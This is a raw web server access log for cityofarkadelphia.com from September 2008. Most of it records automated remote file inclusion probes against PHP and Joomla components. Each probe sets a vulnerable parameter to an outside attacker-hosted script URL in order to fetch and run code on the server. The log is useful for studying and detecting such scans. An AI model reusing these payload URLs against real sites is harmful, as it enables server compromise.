212.227.65.79 - - [01/Sep/2008:06:13:57 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:06:14:35 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
98.20.191.124 - - [01/Sep/2008:06:16:26 -0700] "GET /logs/access.log HTTP/1.1" 200 375196 "http://search.yahoo.com/search?p=www.2.cityofarkadelphia.com&fr=yfp-t-203&toggle=1&cop=mss&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; IEMB3)" "cityofarkadelphia.com"
98.20.191.124 - - [01/Sep/2008:06:16:38 -0700] "GET /logs/access_080329.log HTTP/1.1" 200 393216 "http://search.yahoo.com/search?p=www.2.cityofarkadelphia.com&fr=yfp-t-203&toggle=1&cop=mss&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; IEMB3)" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:16:50 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:16:51 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:17:06 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:17:06 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:06:18:05 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:06:18:06 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:06:18:06 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
213.33.84.163 - - [01/Sep/2008:06:18:09 -0700] "GET /logs/access_080601.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.nwstars.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.119.195.22 - - [01/Sep/2008:06:18:22 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "cityofarkadelphia.com"
87.119.195.22 - - [01/Sep/2008:06:18:23 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "cityofarkadelphia.com"
195.10.195.202 - - [01/Sep/2008:06:18:23 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "cityofarkadelphia.com"
195.10.195.202 - - [01/Sep/2008:06:18:23 -0700] "GET ///vwar/backup/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:06:19:11 -0700] "GET /logs/access_080329.log/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:06:19:11 -0700] "GET /errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:06:19:12 -0700] "GET /logs/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.83.0.42 - - [01/Sep/2008:06:19:16 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.83.0.42 - - [01/Sep/2008:06:19:16 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.83.0.42 - - [01/Sep/2008:06:19:16 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:19:54 -0700] "GET //include.php?path[docroot]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:19:55 -0700] "GET /logs//include.php?path[docroot]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
64.83.0.42 - - [01/Sep/2008:06:20:13 -0700] "GET /logs/access_080330.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.96.139.40 - - [01/Sep/2008:06:20:23 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
83.96.139.40 - - [01/Sep/2008:06:20:23 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
83.96.139.40 - - [01/Sep/2008:06:20:24 -0700] "GET //components/com_flyspray/startdown.php?file=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.58.253.207 - - [01/Sep/2008:06:20:28 -0700] "GET /logs/access_071101.log HTTP/1.1" 200 17413 "http://www.soso.com/q?w=EVENTTODAY%2eCOM&sc=web&cid=th.dd.web&gid=U7RZ1s0suQuAdQL5EW7BaR0730c3q0g0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7)" "cityofarkadelphia.com"
218.58.253.207 - - [01/Sep/2008:06:20:36 -0700] "GET /logs/access_071101.log HTTP/1.1" 304 - "http://www.soso.com/q?w=EVENTTODAY%2eCOM&sc=web&cid=th.dd.web&gid=U7RZ1s0suQuAdQL5EW7BaR0730c3q0g0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7)" "cityofarkadelphia.com"
83.96.139.40 - - [01/Sep/2008:06:20:36 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:06:21:19 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:06:21:20 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:06:21:20 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:21:25 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:06:21:27 -0700] "GET /logs/access_080329.log/popup.php?path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:21:29 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:06:21:31 -0700] "GET /popup.php?path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:06:21:37 -0700] "GET /logs/popup.php?path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.96.139.40 - - [01/Sep/2008:06:22:21 -0700] "GET /logs/access_080330.log%20//components/com_flyspray/startdown.php?file=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:22:53 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:22:53 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:23:08 -0700] "GET //include.php?path[docroot]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:23:09 -0700] "GET /logs//include.php?path[docroot]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:24:22 -0700] "GET //include.php?path[docroot]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:24:22 -0700] "GET /logs//include.php?path[docroot]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
212.95.41.98 - - [01/Sep/2008:06:25:00 -0700] "GET ///vwar/backup/errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:06:25:10 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:06:25:11 -0700] "GET //components/com_flyspray/startdown.php?file=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:06:25:11 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
202.72.181.178 - - [01/Sep/2008:06:25:42 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://albgroup.100megsfree8.com/Id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.72.181.178 - - [01/Sep/2008:06:25:42 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://albgroup.100megsfree8.com/Id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.72.181.178 - - [01/Sep/2008:06:25:42 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://albgroup.100megsfree8.com/Id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:06:26:22 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.98.192.98 - - [01/Sep/2008:06:27:53 -0700] "GET /logs/access_080601.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
62.140.23.20 - - [01/Sep/2008:06:40:43 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
62.140.23.20 - - [01/Sep/2008:06:40:43 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
200.25.180.198 - - [01/Sep/2008:06:42:02 -0700] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [01/Sep/2008:06:42:02 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.3 - - [01/Sep/2008:06:47:38 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:48:31 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:48:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
200.25.180.198 - - [01/Sep/2008:06:51:06 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [01/Sep/2008:06:51:16 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [01/Sep/2008:06:51:16 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:51:45 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:51:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
86.57.255.65 - - [01/Sep/2008:06:51:48 -0700] "GET /errors.php?error=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
86.57.255.65 - - [01/Sep/2008:06:51:48 -0700] "GET /logs/access_080101.log/errors.php?error=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
86.57.255.65 - - [01/Sep/2008:06:52:08 -0700] "GET /logs/errors.php?error=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:52:18 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:52:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:53:33 -0700] "GET //modules/My_eGallery/index.php?basepath=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:06:53:33 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:06:57:22 -0700] "GET /logs/access_080329.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:06:57:22 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:06:57:23 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:06:57:32 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:06:59:06 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:06:59:06 -0700] "GET //components/errors.php?error=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:06:59:06 -0700] "GET /logs//components/errors.php?error=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
62.140.19.17 - - [01/Sep/2008:06:59:07 -0700] "GET /logs//constants.php?_CCFG[_PKG_PATH_INCL]=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
62.140.19.17 - - [01/Sep/2008:06:59:07 -0700] "GET //constants.php?_CCFG[_PKG_PATH_INCL]=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "cityofarkadelphia.com"
77.221.130.3 - - [01/Sep/2008:06:59:55 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
77.221.130.3 - - [01/Sep/2008:06:59:55 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
77.221.130.3 - - [01/Sep/2008:06:59:55 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.140.23.20 - - [01/Sep/2008:07:00:08 -0700] "GET //?path%5Bdocroot%5D=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 917 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
62.140.23.20 - - [01/Sep/2008:07:00:08 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 200 4089 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:07:00:11 -0700] "GET /logs/access_080330.log/lostpasswd.php?env[include_prefix]=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:07:00:12 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:07:00:12 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:07:01:34 -0700] "GET ///bemarket/postscript/postscript.php?p_mode=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:07:01:34 -0700] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:07:01:38 -0700] "GET /logs//parse/parser.php?WN_BASEDIR=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:07:01:38 -0700] "GET //parse/parser.php?WN_BASEDIR=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
194.79.66.105 - - [01/Sep/2008:07:02:19 -0700] "GET /logs/?path%5Bdocroot%5D=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 200 4084 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.79.66.105 - - [01/Sep/2008:07:02:20 -0700] "GET /?path%5Bdocroot%5D=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:07:02:42 -0700] "GET /logs/access.log///bemarket/postscript/postscript.php?p_mode=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:07:02:42 -0700] "GET ///bemarket/postscript/postscript.php?p_mode=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:07:02:42 -0700] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:07:03:02 -0700] "GET /logs/access.log///bemarket/postscript/postscript.php?p_mode=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:07:03:02 -0700] "GET ///bemarket/postscript/postscript.php?p_mode=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:07:03:03 -0700] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
62.140.19.17 - - [01/Sep/2008:07:04:57 -0700] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "cityofarkadelphia.com"
62.140.19.17 - - [01/Sep/2008:07:04:58 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "cityofarkadelphia.com"
62.140.19.17 - - [01/Sep/2008:07:07:57 -0700] "GET /skin/zero_vote/error.php?dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:07:08:07 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:07:08:08 -0700] "GET //config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:07:08:08 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
